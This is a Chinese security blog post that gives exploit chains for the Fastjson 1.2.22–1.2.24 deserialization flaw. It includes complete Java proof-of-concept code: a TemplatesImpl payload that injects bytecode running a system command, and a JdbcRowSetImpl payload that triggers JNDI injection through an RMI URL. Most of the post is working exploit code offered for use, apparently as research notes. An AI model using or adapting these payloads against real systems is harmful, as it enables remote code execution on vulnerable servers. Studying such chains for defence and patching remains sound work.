FastJson利用链

Last updated on September 27, 2024 am

影响版本

Fastjson:1.2.22-1.2.24

利用条件

jdk8,springboot项目+依赖如下

1
2
3
4
5
6
7
8
9
10
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.28.0-GA</version>
</dependency>
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.24</version>
</dependency>

使用的是JSON.parseObject(payload, Object.class, Feature.SupportNonPublicField)这种格式的parseObject

或则是JSON.parse(payload,Feature.SupportNonPublicField);这种格式

利用方法

TemplatsImpl链

利用链

1
JSON::parseObject->DefaultJSONParser::parseObject->JavaObjectDeserializer::deserialze->DefaultJSONParser::parse->DefaultJSONParser::parseObject->JavaBeanDeserializer::deserialze->JavaBeanDeserializer::parseField->DefaultFieldDeserializer->parseField->FieldDeserializer->setValue->TemplatesImpl::getOutputProperties

后面就是接TemplatsImpl利用链了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
package com.example.demo;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.codec.binary.Base64;

public class fastjsonTest {
public static void main(String[] args) throws Exception {
ClassPool pool = ClassPool.getDefault();
pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
CtClass cc=pool.makeClass("a");
cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
CtConstructor ctConstructor=cc.makeClassInitializer();
ctConstructor.insertBefore("Runtime.getRuntime().exec(\"calc\");");
byte[] code=cc.toBytecode();
String code_base64= Base64.encodeBase64String(code);
final String NASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
String payload=
"{\"" +
"@type\":\"" + NASTY_CLASS + "\"," + "\"" +
"_bytecodes\":[\"" + code_base64 + "\"]," +
"'_name':'aaa','" +
"_tfactory':{ },\"" +
"_outputProperties\":{ }," + "\"" +
"_version\":\"1.0\",\"" +
"allowedProtocols\":\"all\"}\n";
ParserConfig config=new ParserConfig();
Object obj= JSON.parseObject(payload,Object.class,config, Feature.SupportNonPublicField);
}
}

https://www.cnblogs.com/akka1/p/16138460.html

JdbcRowSetImpl链

这条链就是利用Fastjson反序列化导致JNDI注入从而命令执行,需要能出网

1
2
3
4
5
6
7
8
9
10
11
12
package com.example.demo;

import com.alibaba.fastjson.JSON;

public class JdbcRowSetImplTest {
public static void main(String[] args) throws Exception {
String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/RCE\", \"autoCommit\":true}";
JSON.parse(PoC);
}

}

https://blog.csdn.net/weixin_43263451/article/details/125862793

fastjson多种利用方式

https://www.cnblogs.com/nice0e3/p/14776043.html


本文作者: fru1ts
本文链接: https://fru1ts.github.io/2024/09/02/FastJson%E5%88%A9%E7%94%A8%E9%93%BE/
版权声明: 本站均采用BY-SA协议,除特别声明外,转载请注明出处!